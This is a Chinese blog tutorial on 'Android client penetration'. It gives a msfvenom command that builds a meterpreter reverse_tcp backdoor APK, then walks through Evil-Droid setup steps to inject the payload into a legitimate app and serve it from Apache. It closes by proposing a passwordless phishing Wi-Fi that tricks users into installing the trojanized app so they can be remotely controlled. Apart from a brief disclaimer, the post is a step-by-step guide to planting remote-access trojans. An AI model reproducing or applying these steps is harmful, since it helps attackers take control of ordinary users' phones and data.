安卓客户端渗透

在此声明文章仅供相互学习参考,严禁利用于违法犯罪,任何事故自行承担!!

一、生成APK后门

通过 MSF 生成一个 apk 的后门应用

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 R > hack.apk

将它移到/var/www/html/目录下

mv hack.apk /var/www/html/

在Windows上下载,并在模拟器中安装再打开,和其他的渗透测试的一样的步骤监听等待目标机上返回连接,kali即可获得权限

 当然也可以下载到自己手机中,最好是已经换下来的旧手机

二、注入后门到APP

首先要禁用IPV6,不然可能会影响生成的payload质量

使用命令echo "net.ipv6.conf.eth0.disable_ipv6=1" \>\>/etc/sysctl.conf

然后通过sysctl -p检查

我们使用Evil-Droid工具,这是一个基于Python的开源工具,专门用于自动化安卓应用的安全分析。它旨在帮助安全研究人员、开发人员和普通用户快速检测潜在的恶意行为或漏洞,并理解应用程序的工作原理。

将安装Evil-Droid工具上传并解压进入目录中

这个工具会检测是否联网,检测的方式是通过ping谷歌来确定,一般来说我们无法ping通谷歌,所以我们要修改一下其中的配置文件,让这个工具通过ping百度来确实是否联网。

使用vim evil-droid修改一下evil-droid文件

修改第40行将“google.com”改为"baidu.com"

修改第649行将“-fa monaco”删去

然后为该文件添加执行权限(执行代码后文件变绿说明成功添加权限)

chmod +x evil-droid

升级tools文件夹中的apktool.jar,该工具用于逆向apk文件。它可以将资源解码,并在修改后可以重新构建它们。它还可以执行一些自动化任务,例如构建apk文件。工具包中默认的版本为2.2已过期,需要进行更新,至少是2.4版本。

运行./evil-droid,在检测到网络环境正常后会自动下载缺少的依赖,下面是部分运行界面

完成后运行

我们选择3(NEW)

然后是监听地址、端口、payload名称默认即可,payload类型选择android/meterpreter/reverse_tcp

之后就进入了图形化界面选择需要植入后门的apk文件

选择好安装包,点击“确定”后,会跳出如下界面,可以选择“确定”,也可以在msf中监听,这里我选择“exit”

我们再将安装包移到apache服务下,并再次开启apache

evil-droid结束后会自动关闭apache服务一定要再次手动开启

目标下载app打开后,kali就获得了对应权限

三、总结

安卓客户端渗透目前来说已经是CTF中一个非常重要的分类了,但是通常的它更多的是二进制层面的博弈,如果仅仅是在apk中注入后门可能非常简单,但通常需要的是一系列的攻击手段来辅助完成的。关于渗透思路,可以将payload注入到正常的apk中,构建一个钓鱼wifi,比如说设置一个没有密码的钓鱼wifi,需要下载软件才能正常上网,用户下载运行软件后即被远程控制。

  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值